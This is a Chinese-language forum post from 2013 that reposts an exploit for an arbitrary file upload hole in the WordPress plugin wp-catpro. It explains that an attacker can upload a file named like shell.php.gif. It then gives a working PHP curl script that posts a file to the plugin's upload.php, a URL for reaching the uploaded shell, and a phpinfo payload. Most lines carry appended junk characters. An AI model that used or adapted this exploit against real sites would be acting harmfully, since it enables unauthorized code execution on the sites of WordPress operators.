找回密码
 立即注册
查看: 2985|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability& f, `# L/ @1 v& b8 j* C. N
#-----------------------------------------------------------------------
$ B& v+ ~* v4 c- Y  d
( f5 ?$ v* m- P4 L作者  => Zikou-162 ]& J- H1 H+ j7 p# f$ }
邮箱 => zikou16x@gmail.com8 n( v$ O$ Q$ R/ }. s2 m# ]
测试系统 : Windows 7 , Backtrack 5r3: ?2 W9 a( X  F, G) M7 H4 l1 s
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
6 q/ U- \2 f" w0 ]5 U$ Q####
  S+ ]9 }$ X$ B
, S, ^" d2 M* ?0 m, v#=> Exploit 信息:9 b  o( c6 @5 S+ p4 ?: x# e& M
------------------
& d7 V  O  F' |) e6 w- m# S+ w* O# 攻击者可以上传 file/shell.php.gif
9 w) o4 F  I. R4 T5 m# ("jpg", "gif", "png")  // Allowed file extensions
: _+ X" [! `2 G; @5 R& A# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
6 z" `& X& \# x1 s+ V" r# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
9 Z. C/ W- b( ~2 ]$ T1 Y) z------------------
1 h6 ~, a" M% A
3 i# c( C3 V- y: o  t# H9 r. }7 ^8 }" G#=> Exploit
: K( d+ l8 W$ \  M" v-----------2 o% r$ g0 @* m" R8 e9 I
<?php9 e2 P6 u$ s( m% c7 R$ O

9 U+ X. N3 Q+ ?* x; w0 A; ~$uploadfile="zik.php.gif";
) G/ X3 c; ]" S( s7 m( c1 @$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");7 W7 e4 [, k. d7 Z& ]+ D# J
curl_setopt($ch, CURLOPT_POST, true);
* [. n1 w' T' W2 z$ Hcurl_setopt($ch, CURLOPT_POSTFIELDS,
, A# k) K. D  Y% c8 varray('Filedata'=>"@$uploadfile",7 |  r6 W3 |' n
'folder'=>'/wp-content/uploads/catpro/'));0 Z4 i/ c& A2 h6 M" z6 K( g, Q
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);2 U6 i" g& v/ C. P, S
$postResult = curl_exec($ch);1 q( s2 }7 n* l' [1 D0 ~
curl_close($ch);
7 V4 d5 k# x' K' M
( [- b8 T3 W1 q& y( h* iprint "$postResult";5 @$ a; V" c2 `3 b' b

  M) J" l0 a- I+ ^! ?' ~Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif  o/ C8 p+ B3 ]; I; b7 V* V
  ?>
& [0 G1 T1 f' _+ N$ q  R0 b4 @<?php
7 R& l5 |- t1 N" cphpinfo();
4 D. `- R: n! r4 g% \6 u& u) a?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表